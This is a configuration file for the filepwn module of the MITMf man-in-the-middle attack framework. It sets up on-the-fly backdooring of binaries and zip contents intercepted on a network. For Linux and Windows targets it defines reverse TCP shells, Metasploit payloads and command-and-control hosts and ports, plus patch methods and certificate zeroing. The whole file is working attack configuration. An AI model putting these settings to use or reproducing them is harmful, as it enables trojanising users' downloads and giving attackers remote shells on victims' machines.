MITMf/config_files/filepwn.cfg

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# patchCount is the max number of files to patch in a zip file
# After the max is reached it will bypass the rest of the files
# and send on it's way
patchCount = 5
# In Bytes
maxSize = 40000000
blacklist = .dll, #don't do dlls in a zip file
[targets]
#MAKE SURE that your settings for host and port DO NOT
# overlap between different types of payloads
[[ALL]] # DEFAULT settings for all targets REQUIRED
LinuxType = ALL # choices: x86/x64/ALL/None
WindowsType = ALL # choices: x86/x64/ALL/None
FileSizeMax = 50000000 # ~50 MB (just under) No patching of files this large
[[[LinuxIntelx86]]]
SHELL = reverse_shell_tcp # This is the BDF syntax
HOST = 192.168.1.168 # The C2
PORT = 8888
SUPPLIED_SHELLCODE = None
MSFPAYLOAD = linux/x86/shell_reverse_tcp # MSF syntax
[[[LinuxIntelx64]]]
SHELL = reverse_shell_tcp
HOST = 192.168.10.4
PORT = 6666
SUPPLIED_SHELLCODE = None
MSFPAYLOAD = linux/x64/shell_reverse_tcp
[[[WindowsIntelx86]]]
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
HOST = 192.168.10.4
PORT = 6666
SHELL = iat_reverse_tcp
SUPPLIED_SHELLCODE = None
ZERO_CERT = False
PATCH_DLL = True
MSFPAYLOAD = windows/shell_reverse_tcp
[[[WindowsIntelx64]]]
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
HOST = 192.168.1.16
PORT = 8088
SHELL = reverse_shell_tcp
SUPPLIED_SHELLCODE = None
ZERO_CERT = True
PATCH_DLL = False
MSFPAYLOAD = windows/x64/shell_reverse_tcp